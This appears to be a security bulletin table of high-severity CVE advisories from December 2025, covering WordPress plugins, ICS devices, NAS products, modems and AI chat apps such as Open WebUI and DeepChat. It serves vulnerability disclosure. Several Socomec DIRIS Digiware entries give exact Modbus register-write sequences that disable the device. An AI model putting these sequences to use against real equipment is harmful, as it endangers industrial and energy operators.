| open-webui--open-webui | Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Stored XSS vulnerability was discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to execute arbitrary JavaScript code and steal session tokens when a victim downloads the note as PDF. This vulnerability can be exploited by any authenticated user, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files. This vulnerability is fixed in 0.6.37. | 2025-12-04 | 8.7 | CVE-2025-65959 | https://github.com/open-webui/open-webui/security/advisories/GHSA-8wvc-869r-xfqf https://github.com/open-webui/open-webui/commit/03cc6ce8eb5c055115406e2304fbf7e3338b8dce |
| orionsec--orion-ops | A flaw has been found in orionsec orion-ops up to 5925824997a3109651bbde07460958a7be249ed1. Affected by this vulnerability is the function update of the file orion-ops-api/orion-ops-web/src/main/java/cn/orionsec/ops/controller/UserController.java of the component User Profile Handler. This manipulation of the argument ID causes improper authorization. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 7.3 | CVE-2025-13808 | VDB-333818 | orionsec orion-ops User Profile UserController.java update improper authorization VDB-333818 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692068 | orionsec Orion-ops (server component) <= master commit 5925824997a3109651bbde07460958a7be249ed1 Improper Authorization / Horizontal Privilege Escalation https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-privilege-escalation-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-privilege-escalation-1/report.md#proof-of-concept |
| pickplugins--User Verification by PickPlugins | The Email Verification, Email OTP, Block Spam Email, Passwordless login, Hide Login, Magic Login - User Verification plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.0.39. This is due to the plugin not properly validating that an OTP was generated before comparing it to user input in the "user_verification_form_wrap_process_otpLogin" function. This makes it possible for unauthenticated attackers to log in as any user with a verified email address, such as an administrator, by submitting an empty OTP value. | 2025-12-05 | 9.8 | CVE-2025-12374 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8ccb1304-326e-43af-b75d-23874f92ba8b?source=cve https://plugins.trac.wordpress.org/browser/user-verification/trunk/templates/email-otp-login-form/hook.php#L141 |
| Plesk--Plesk | WebPros Plesk before 18.0.73.5 and 18.0.74 before 18.0.74.2 on Linux allows remote authenticated users to execute arbitrary code as root via domain creation. The attacker needs "Create and manage sites" with "Domains management" and "Subdomains management." | 2025-12-03 | 7.8 | CVE-2025-66431 | https://docs.plesk.com/release-notes/obsidian/whats-new/ https://docs.plesk.com/release-notes/obsidian/change-log/#plesk-18074 https://support.plesk.com/hc/en-us/articles/36494997377687--CVE-2025-66431-Security-vulnerability-in-domain-creation-mechanism-allows-Plesk-users-to-execute-arbitrary-code-on-behalf-of-root |
| plugins360--All-in-One Video Gallery | The All-in-One Video Gallery plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the resolve_import_directory() function in versions 4.5.4 to 4.5.7. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-06 | 8.8 | CVE-2025-12966 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b03bca1-84e3-4220-b39b-69044c42e9f9?source=cve https://plugins.trac.wordpress.org/changeset/3405593/all-in-one-video-gallery/trunk/admin/import-export.php |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng's simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng's internal state management. Upgrade to libpng 1.6.52 or later. | 2025-12-03 | 7.1 | CVE-2025-66293 | https://github.com/pnggroup/libpng/security/advisories/GHSA-9mpm-9pxh-mg4f https://github.com/pnggroup/libpng/issues/764 https://github.com/pnggroup/libpng/commit/788a624d7387a758ffd5c7ab010f1870dea753a1 https://github.com/pnggroup/libpng/commit/a05a48b756de63e3234ea6b3b938b8f5f862484a |
| RashminDungrani--online-banking | A vulnerability was found in RashminDungrani online-banking up to 2337ad552ea9d385b4e07b90e6f32d011b7c68a2. This affects an unknown part of the file /site/dist/auth_login.php. Performing manipulation of the argument Username results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.3 | CVE-2025-14192 | VDB-334612 | RashminDungrani online-banking auth_login.php sql injection VDB-334612 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699237 | online-banking web 1 SQL Injection https://github.com/BrillBigbang/hole-gap/blob/main/online-banking-have-sql.docx |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in WebKitGTK. Processing malicious web content can cause an unexpected process crash due to improper memory handling. | 2025-12-04 | 8.8 | CVE-2025-66287 | RHSA-2025:22789 RHSA-2025:22790 https://access.redhat.com/security/cve/CVE-2025-66287 RHBZ#2418857 https://webkitgtk.org/security/WSA-2025-0009.html |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in WebKitGTK. This vulnerability allows remote, user-assisted information disclosure that can reveal any file the user is permitted to read via abusing the file drag-and-drop mechanism where WebKitGTK does not verify that drag operations originate from outside the browser. | 2025-12-03 | 7.4 | CVE-2025-13947 | RHSA-2025:22789 RHSA-2025:22790 https://access.redhat.com/security/cve/CVE-2025-13947 RHBZ#2418576 |
| Red Hat--Red Hat JBoss Enterprise Application Platform 8 | A flaw was found in Undertow that can cause remote denial of service attacks. When the server uses the FormEncodedDataDefinition.doParse(StreamSourceChannel) method to parse large form data encoding with application/x-www-form-urlencoded, the method will cause an OutOfMemory issue. This flaw allows unauthorized users to cause a remote denial of service (DoS) attack. | 2025-12-03 | 7.5 | CVE-2024-3884 | RHSA-2025:22773 RHSA-2025:22775 RHSA-2025:22777 RHSA-2025:3990 RHSA-2025:3992 https://access.redhat.com/security/cve/CVE-2024-3884 RHBZ#2275287 |
| rommapp--romm | RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. RomM contains multiple unrestricted file upload vulnerabilities that allow authenticated users to upload malicious SVG or HTML files. When these files are accessed the browser executes embedded JavaScript, leading to stored Cross-Site Scripting (XSS) which when combined with a CSRF misconfiguration they lead to achieve full administrative account takeover, creating a rogue admin account, escalating the attacker account role to admin, and much more. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2. | 2025-12-03 | 7.6 | CVE-2025-65027 | https://github.com/rommapp/romm/security/advisories/GHSA-v3c6-w996-f7hx |
| rtowebsites--PostGallery | The PostGallery plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the 'PostGalleryUploader' class functions in all versions up to, and including, 1.12.5. This makes it possible for authenticated attackers, with subscriber-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-04 | 8.8 | CVE-2025-13543 | https://www.wordfence.com/threat-intel/vulnerabilities/id/13348eb5-5001-4ec4-bc6a-44795bbed203?source=cve https://plugins.trac.wordpress.org/browser/postgallery/tags/1.12.5/admin/PostGalleryUploader.php |
| Samsung Mobile--MotionPhoto | Improper access control in MPRemoteService of MotionPhoto prior to version 4.1.51 allows local attackers to start privileged service. | 2025-12-02 | 7.3 | CVE-2025-58481 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--MotionPhoto | Improper access control in MPLocalService of MotionPhoto prior to version 4.1.51 allows local attackers to start privileged service. | 2025-12-02 | 7.3 | CVE-2025-58482 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to unauthorized modification of arbitrary WordPress options in all versions up to, and including, 3.28.20. This is due to insufficient capability checks and input validation in the ActionOptions::run() save handler. This makes it possible for unauthenticated attackers to modify critical WordPress options such as users_can_register, default_role, and admin_email via submitting crafted form data to public frontend forms. | 2025-12-03 | 9.8 | CVE-2025-13342 | https://www.wordfence.com/threat-intel/vulnerabilities/id/613f2035-3061-429b-b218-83805287e4f3?source=cve https://plugins.trac.wordpress.org/changeset/3400432/acf-frontend-form-element |
| sigstore--fulcio | Fulcio is a free-to-use certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Prior to 1.8.3, function identity.extractIssuerURL splits (via a call to strings.Split) its argument (which is untrusted data) on periods. As a result, in the face of a malicious request with an (invalid) OIDC identity token in the payload containing many period characters, a call to extractIssuerURL incurs allocations to the tune of O(n) bytes (where n stands for the length of the function's argument), with a constant factor of about 16. This vulnerability is fixed in 1.8.3. | 2025-12-04 | 7.5 | CVE-2025-66506 | https://github.com/sigstore/fulcio/security/advisories/GHSA-f83f-xpx7-ffpw https://github.com/sigstore/fulcio/commit/765a0e57608b9ef390e1eeeea8595b9054c63a5a |
| sigstore--timestamp-authority | Sigstore Timestamp Authority is a service for issuing RFC 3161 timestamps. Prior to 2.0.3, Function api.ParseJSONRequest currently splits (via a call to strings.Split) an optionally-provided OID (which is untrusted data) on periods. Similarly, function api.getContentType splits the Content-Type header (which is also untrusted data) on an application string. As a result, in the face of a malicious request with either an excessively long OID in the payload containing many period characters or a malformed Content-Type header, a call to api.ParseJSONRequest or api.getContentType incurs allocations of O(n) bytes (where n stands for the length of the function's argument). This vulnerability is fixed in 2.0.3. | 2025-12-04 | 7.5 | CVE-2025-66564 | https://github.com/sigstore/timestamp-authority/security/advisories/GHSA-4qg8-fj49-pxjh https://github.com/sigstore/timestamp-authority/commit/0cae34e197d685a14904e0bad135b89d13b69421 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability. | 2025-12-01 | 8.6 | CVE-2024-48882 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2119 https://www.socomec.fr/sites/default/files/2025-04/CVE-2024-48882---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-17-43_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability. | 2025-12-01 | 8.6 | CVE-2025-23417 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2139 https://www.socomec.fr/sites/default/files/2025-04/CVE-2025-23417---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-16-19_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A buffer overflow vulnerability exists in the Modbus TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted set of network packets can lead to denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability. | 2025-12-01 | 8.6 | CVE-2025-26858 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2152 https://www.socomec.fr/sites/default/files/2025-10/CVE-2025-26858---Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-38-44_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP USB Function functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.This vulnerability is specific to the malicious message sent via Modbus TCP over port 502. | 2025-12-01 | 8.6 | CVE-2025-55221 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2251 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP USB Function functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.This vulnerability is specific to the malicious message sent via Modbus RTU over TCP on port 503. | 2025-12-01 | 8.6 | CVE-2025-55222 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2251 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service and weaken credentials resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability. | 2025-12-01 | 7.2 | CVE-2024-49572 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2118 https://www.socomec.fr/sites/default/files/2025-04/CVE-2024-49572---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-12-08_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A cross-site request forgery (csrf) vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability. | 2025-12-01 | 7.5 | CVE-2024-53684 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2116 https://www.socomec.fr/sites/default/files/2025-10/CVE-2024-53684---Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-43-14_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service and weaken credentials resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability. | 2025-12-01 | 7.2 | CVE-2025-20085 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2138 https://www.socomec.fr/sites/default/files/2025-04/CVE-2025-20085---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-14-39_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.An attacker can trigger this denial-of-service condition by sending a sequence of Modbus TCP messages to port 502 using the Write Single Register function code (6). The attack sequence begins with a message to register 58112 with a value of 1000, indicating that a configuration change will follow. Next, a message is sent to register 29440 with a value corresponding to the new Modbus address to be configured. Finally, a message to register 57856 with a value of 161 commits the configuration change. After this configuration change, the device will be in a denial-of-service state. | 2025-12-01 | 7.5 | CVE-2025-54848 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.An attacker can trigger this denial-of-service condition by sending a single Modbus TCP message to port 502 using the Write Single Register function code (6) to write the value 1 to register 4352. This action changes the Modbus address to 15. After this message is sent, the device will be in a denial-of-service state. | 2025-12-01 | 7.5 | CVE-2025-54849 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.An attacker can trigger this denial-of-service condition by sending a sequence of Modbus RTU over TCP messages to port 503 using the Write Single Register function code (6). The attack sequence begins with a message to register 58112 with a value of 1000, indicating that a configuration change will follow. Next, a message is sent to register 29440 with a value corresponding to the new Modbus address to be configured. Finally, a message to register 57856 with a value of 161 commits the configuration change. After this configuration change, the device will be in a denial-of-service state. | 2025-12-01 | 7.5 | CVE-2025-54850 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.An attacker can trigger this denial-of-service condition by sending a single Modbus TCP message to port 503 using the Write Single Register function code (6) to write the value 1 to register 4352. This action changes the Modbus address to 15. After this message is sent, the device will be in a denial-of-service state. | 2025-12-01 | 7.5 | CVE-2025-54851 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248 |
| Socomec--Easy Config System | An authentication bypass vulnerability exists in the User profile management functionality of Socomec Easy Config System 2.6.1.0. A specially crafted database record can lead to unauthorized access. An attacker can modify a local database to trigger this vulnerability. | 2025-12-01 | 7.3 | CVE-2024-45370 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2117 https://www.socomec.fr/sites/default/files/2025-11/CVE-2024-45370---ECS-2610---CVSS31_VULNERABILITIES_2025-11-19-09-45-29_English_PLURI_3.pdf |
| Splunk--Splunk Enterprise | In Splunk Enterprise for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to an affected version can result in incorrect permissions assignment in the Splunk Enterprise for Windows Installation directory. This lets non-administrator users on the machine access the directory and all its contents. | 2025-12-03 | 8 | CVE-2025-20386 | https://advisory.splunk.com/advisories/SVD-2025-1205 |
| Splunk--Splunk Enterprise | In Splunk Universal Forwarder for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to an affected version can result in incorrect permissions assignment in the Universal Forwarder for Windows Installation directory. This lets non-administrator users on the machine access the directory and all its contents. | 2025-12-03 | 8 | CVE-2025-20387 | https://advisory.splunk.com/advisories/SVD-2025-1206 |
| Sprecher Automation--SPRECON-E-C | Sprecher Automations SPRECON-E-C, SPRECON-E-P, SPRECON-E-T3 is vulnerable to attack by an unauthorized remote attacker via default cryptographic keys. The use of these keys allows the attacker to read, modify, and write projects and data, or to access any device via remote maintenance. | 2025-12-02 | 9.8 | CVE-2025-41742 | https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511042_de.pdf |
| Sprecher Automation--SPRECON-E-C | Sprecher Automations SPRECON-E series uses default cryptographic keys that allow an unprivileged remote attacker to access all encrypted communications, thereby compromising confidentiality and integrity. | 2025-12-02 | 9.1 | CVE-2025-41744 | https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511043_de.pdf |
| stellarwp--Kadence WooCommerce Email Designer | The Kadence WooCommerce Email Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the customer name in all versions up to, and including, 1.5.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-02 | 7.2 | CVE-2025-13387 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1e0cf512-f676-4f47-abaa-5198998376b7?source=cve https://plugins.trac.wordpress.org/changeset/3399955/kadence-woocommerce-email-designer |
| strimzi--strimzi-kafka-operator | Strimzi provides a way to run an Apache Kafka cluster on Kubernetes or OpenShift in various deployment configurations. From 0.47.0 and prior to 0.49.1, in some situations, Strimzi creates an incorrect Kubernetes Role which grants the Apache Kafka Connect and Apache Kafka MirrorMaker 2 operands the GET access to all Kubernetes Secrets that exist in the given Kubernetes namespace. The issue is fixed in Strimzi 0.49.1. | 2025-12-05 | 7.4 | CVE-2025-66623 | https://github.com/strimzi/strimzi-kafka-operator/security/advisories/GHSA-xrhh-hx36-485q https://github.com/strimzi/strimzi-kafka-operator/commit/c8a14935e99c91eb0dd865431f46515da9f82ccc |
| stylemix--Cost Calculator Builder | The Cost Calculator Builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the deleteOrdersFiles() function in all versions up to, and including, 3.6.3. This makes it possible for unauthenticated attackers to inject arbitrary file paths into the orders that are removed, when an administrator deletes them. This can lead to remote code execution when the right file is deleted (such as wp-config.php). This vulnerability requires the Cost Calculator Builder Pro version to be installed along with the free version in order to be exploitable. | 2025-12-02 | 8.8 | CVE-2025-12529 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4154684d-3f9b-418f-b9d1-a5d22d4d84d3?source=cve https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L513 https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L262 |
| Sunbird--DCIM dcTrack | DCIM dcTrack allows an attacker to misuse certain remote access features. An authenticated user with access to the appliance's virtual console could exploit these features to redirect network traffic, potentially accessing restricted services or data on the host machine. | 2025-12-04 | 7.2 | CVE-2025-66238 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-05 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-05.json |
| Synology--BeeDrive for desktop | Missing authentication for critical function vulnerability in BeeDrive in Synology BeeDrive for desktop before 1.4.2-13960 allows local users to execute arbitrary code via unspecified vectors. | 2025-12-04 | 7.8 | CVE-2025-54158 | Synology-SA-25:08 BeeDrive for desktop |
| Synology--BeeDrive for desktop | Missing authorization vulnerability in BeeDrive in Synology BeeDrive for desktop before 1.4.2-13960 allows remote attackers to delete arbitrary files via unspecified vectors. | 2025-12-04 | 7.5 | CVE-2025-54159 | Synology-SA-25:08 BeeDrive for desktop |
| Synology--BeeDrive for desktop | Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in BeeDrive in Synology BeeDrive for desktop before 1.4.2-13960 allows local users to execute arbitrary code via unspecified vectors. | 2025-12-04 | 7.8 | CVE-2025-54160 | Synology-SA-25:08 BeeDrive for desktop |
| Synology--DiskStation Manager (DSM) | Cross-Site Request Forgery (CSRF) vulnerability in WebAPI Framework in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 and 7.2.2-72806 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote attackers to execute arbitrary code via unspecified vectors. | 2025-12-04 | 9.6 | CVE-2024-45538 | Synology-SA-24:27 DSM |
| Synology--DiskStation Manager (DSM) | Out-of-bounds write vulnerability in cgi components in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 and 7.2.2-72806 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote attackers to conduct denial-of-service attacks via unspecified vectors. | 2025-12-04 | 7.5 | CVE-2024-45539 | Synology-SA-24:27 DSM |
| Synology--Synology Router Manager (SRM) | A vulnerability in portenable cgi allows remote authenticated users to get the status of installed packages. | 2025-12-04 | 7.2 | CVE-2025-29846 | Synology-SA-25:04 SRM |
| Syslifters--sysreptor | SysReptor is a fully customizable pentest reporting platform. Prior to 2025.102, there is a Stored Cross-Site Scripting (XSS) vulnerability allows authenticated users to execute malicious JavaScript in the context of other logged-in users by uploading malicious JavaScript files in the web UI. This vulnerability is fixed in 2025.102. | 2025-12-04 | 7.3 | CVE-2025-66561 | https://github.com/Syslifters/sysreptor/security/advisories/GHSA-64vw-v5c4-mgvm |
| ThinkInAIXYZ--deepchat | DeepChat is a smart assistant uses artificial intelligence. In 0.5.0 and earlier, there is a Stored Cross-Site Scripting (XSS) vulnerability in the Mermaid diagram renderer allows an attacker to execute arbitrary JavaScript within the application context. By leveraging the exposed Electron IPC bridge, this XSS can be escalated to Remote Code Execution (RCE) by registering and starting a malicious MCP (Model Context Protocol) server. | 2025-12-03 | 9.7 | CVE-2025-66222 | https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-v8v5-c872-mf8r https://github.com/ThinkInAIXYZ/deepchat/commit/371ca7b42e3685aee6e3f0c61e85277ed1ff4db7 |
| TOZED--ZLT M30S | A vulnerability has been found in TOZED ZLT M30S and ZLT M30S PRO 1.47/3.09.06. Affected is an unknown function of the component Web Interface. Such manipulation leads to hard-coded credentials. The attack needs to be initiated within the local network. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14126 | VDB-334521 | TOZED ZLT M30S/ZLT M30S PRO Web hard-coded credentials VDB-334521 | CTI Indicators (IOB, IOC, TTP) Submit #697498 | ZLT M30S & M30S PRO MTNNGRM30S_1.47, M30SPRO_3.09.06 (Other versions might be vulnerable) Backdoor Credentials https://youtu.be/o8rfjSlpRxY |
| TrippWasTaken--PHP-Guitar-Shop | A weakness has been identified in TrippWasTaken PHP-Guitar-Shop up to 6ce0868889617c1975982aae6df8e49555d0d555. This vulnerability affects unknown code of the file /product.php of the component Product Details Page. Executing manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 7.3 | CVE-2025-14091 | VDB-334481 | TrippWasTaken PHP-Guitar-Shop Product Details product.php sql injection VDB-334481 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696514 | PHP-Guitar-Shop web 1 SQL Injection https://github.com/appaxv/report/blob/main/guitarshopsql.docx |
| trustindex--Widgets for Google Reviews | The Widgets for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 13.2.4 due to insufficient input sanitization and output escaping on Google Reviews data imported by the plugin. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute in the admin panel (and potentially on the frontend) whenever a user accesses imported reviews, granted they can add a malicious review to a Google Place that is connected to the vulnerable site. | 2025-12-06 | 7.2 | CVE-2025-12510 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7adf3335-ed13-43f4-a5f3-05e89be44d2d?source=cve https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5932 https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5907 https://plugins.trac.wordpress.org/changeset/3399469/wp-reviews-plugin-for-google/trunk/trustindex-plugin.class.php?old=3398822&old_path=wp-reviews-plugin-for-google%2Ftrunk%2Ftrustindex-plugin.class.php |
| tsaiid--Featured Image via URL | The Featured Image via URL plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation function in all versions up to, and including, 0.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-05 | 8.8 | CVE-2025-12153 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9687a88f-ac5b-4746-a68c-91c358b5fb87?source=cve https://wordpress.org/plugins/featured-image-via-url/ |
| Ubuntu--MAAS | An Improper Input Validation vulnerability exists in the user websocket handler of MAAS. An authenticated, unprivileged attacker can intercept a user.update websocket request and inject the is_superuser property set to true. The server improperly validates this input, allowing the attacker to self-promote to an administrator role. This results in full administrative control over the MAAS deployment. | 2025-12-03 | 7.7 | CVE-2025-7044 | https://bugs.launchpad.net/maas/+bug/2115714 |
| UGREEN--DH2100+ | A weakness has been identified in UGREEN DH2100+ up to 5.3.0.251125. This affects the function handler_file_backup_create of the file /v1/file/backup/create of the component nas_svr. Executing manipulation of the argument path can lead to buffer overflow. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.2 | CVE-2025-14187 | VDB-334607 | UGREEN DH2100+ nas_svr create handler_file_backup_create buffer overflow VDB-334607 | CTI Indicators (IOB, IOC, IOA) Submit #698652 | UGREEN DH2100+ NAS V4.2.0.601 Buffer Overflow https://www.notion.so/2b16cf4e528a80bbb5fdeff145f110ec |
| UGREEN--DH2100+ | A security vulnerability has been detected in UGREEN DH2100+ up to 5.3.0.251125. This impacts the function handler_file_backup_create of the file /v1/file/backup/create of the component nas_svr. The manipulation of the argument path leads to command injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.2 | CVE-2025-14188 | VDB-334608 | UGREEN DH2100+ nas_svr create handler_file_backup_create command injection VDB-334608 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698833 | UGREEN DH2100+ NAS V4.2.0.601 Remote Command Execution https://www.notion.so/25e2b76e8e0c80578014fff04a950576 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-11131 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-11132 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-11133 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In dpc modem, there is a possible system crash due to null pointer dereference. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-3012 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61607 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61608 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
